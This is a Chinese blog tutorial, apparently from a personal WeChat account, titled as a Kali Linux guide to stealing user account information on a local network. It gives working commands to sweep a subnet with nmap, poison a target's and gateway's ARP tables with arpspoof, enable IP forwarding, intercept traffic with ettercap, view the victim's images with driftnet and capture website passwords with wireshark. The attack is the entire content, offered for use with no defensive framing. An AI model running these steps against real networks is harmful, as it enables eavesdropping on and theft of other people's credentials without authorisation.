本人微信公众号"aeolian"~

kaliLinux内网渗透 - 盗取用户账号信息

查看所属内网网段

ifconfig查看自己的ip为222.222.221.140

 《kaliLinux内网渗透 - 盗取用户账号信息》

nmap扫描内网ip

nmap -sP 222.222.221.0/24

扫描出内网所有的IP

《kaliLinux内网渗透 - 盗取用户账号信息》

开启ARP欺骗

kali欺骗目标机器说自己是222.222.221.107,同时欺骗网关说自己是222.222.221.138。开启欺骗后目标主机会不能上网,因为数据包转发到你这里了。

arpspoof -i eth0 -t 222.222.221.138 -r 222.222.221.107

arpspoof命令 
后面接上与网络有关的-i(interface) 
网卡eth0 
目标-t(target) 
目标IP:222.222.221.138 
目标主机网关222.222.221.107

《kaliLinux内网渗透 - 盗取用户账号信息》

开启转发

这时目标主机138又可以正常上网。

cat /proc/sys/net/ipv4/ip_forward
echo 1 >> /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

《kaliLinux内网渗透 - 盗取用户账号信息》

截获数据包

ettercap -T -q -M ARP /222.222.221.138// ///

《kaliLinux内网渗透 - 盗取用户账号信息》

直接显示图片

driftnet -i eth0

《kaliLinux内网渗透 - 盗取用户账号信息》

wireshark抓取数据

截取数据包可以直接用wireshark抓取指定网站密码

参考:https://cloud.tencent.com/developer/news/103648

 

点赞

Leave a Reply

Your email address will not be published. Required fields are marked *